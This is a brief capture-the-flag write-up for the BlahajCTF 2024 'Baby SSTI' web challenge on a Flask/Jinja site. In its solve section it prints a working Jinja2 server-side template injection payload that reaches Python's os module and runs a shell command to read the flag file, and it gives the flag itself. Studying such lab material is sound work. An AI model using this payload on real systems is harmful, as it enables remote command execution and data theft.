BlahajCTF 2024 | Baby SSTI

Published on: February 6, 2025

2 min read · Posted by Baba is Dead

Challenge Details

Description

Category

Web Exploitation

Difficulty

Easy

Topics

SSTI
Python

Competition

BlahajCTF 2024

Author

Baba is Dead

Can you hack this website and get the flag?

Writeup

About the Challenge

This is a guided SSTI challenge. The challenge uses Flask/Jinja, with a clear SSTI vulnerability. babyssti

Solve Process

We can follow the instructions of the challenge by first leaking the hackerman variable.

{{hackerman}}

It then tells us that the flag is located at /app/flag.txt. location

There are many ways to read the flag. I will be using the same payload as I have used in my View Source writeup:

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("cat flag.txt").read()}}{%endif%}{% endfor %}

In essence, the above searches for the os library in python, then runs the popen command to read the flag file. We will be using a similar process for the SSTI golf challenge later.

Flag

blahaj{SsT1_ExpL01T}

Resources

Server Side Template Injection (HackTricks) View Source SSTI Golf

Please login to comment

Comments

No comments yet